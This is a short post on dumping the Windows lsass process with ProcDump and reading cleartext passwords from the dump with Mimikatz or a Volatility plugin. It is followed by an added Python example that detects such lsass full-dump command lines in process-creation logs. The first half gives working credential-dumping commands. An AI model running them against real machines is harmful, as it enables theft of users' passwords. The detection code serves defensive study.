Using Mimikatz to get cleartext passwords from an offline memory dump

#For 32 bits
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#For 64 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
  1. cd /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
  5. apt-get install python-crypto
  6. volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f halomar.dmp mimikatz
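
On the detection side, the ProcDump step above leaves a recognisable process-creation command line. The following is an added example, not part of the original post: it flags a full dump of lsass by its arguments rather than by the binary name, over constructed Sysmon-style records. The function names, the sample records and the treatment of /ma as equivalent to -ma are assumptions made for illustration.

```python
import re

DUMP_SWITCHES = {"-ma", "/ma"}  # full-dump switch used on this page; "/ma" form is an assumption
# Matches "lsass" or "lsass.exe", bare or at the end of a path, but not "lsass.dmp".
LSASS_RE = re.compile(r"(^|[\\/])lsass(\.exe)?$", re.IGNORECASE)

# Constructed sample records (process-creation style: Image + CommandLine).
SAMPLE_EVENTS = [
    {"Image": r"C:\temp\procdump.exe",
     "CommandLine": r"C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"Image": r"C:\temp\procdump.exe",
     "CommandLine": r"C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp"},
    {"Image": r"C:\Tools\pd.exe",  # same arguments under a different file name
     "CommandLine": r'pd.exe /accepteula /ma "LSASS.EXE" out.dmp'},
    {"Image": r"C:\temp\procdump.exe",  # full dump, but of an unrelated process
     "CommandLine": r"procdump.exe -ma notepad.exe notepad.dmp"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]

def tokens(command_line):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]

def is_lsass_full_dump(command_line):
    """True when the arguments request a full dump of lsass."""
    args = tokens(command_line)[1:]  # skip argv[0]: the file name is not trusted
    has_switch = any(a.lower() in DUMP_SWITCHES for a in args)
    targets_lsass = any(LSASS_RE.search(a) for a in args)
    return has_switch and targets_lsass

def triage(events):
    """Return (index, image, reason) for every matching record."""
    return [
        (i, ev["Image"], "full memory dump of lsass requested")
        for i, ev in enumerate(events)
        if is_lsass_full_dump(ev["CommandLine"])
    ]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```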
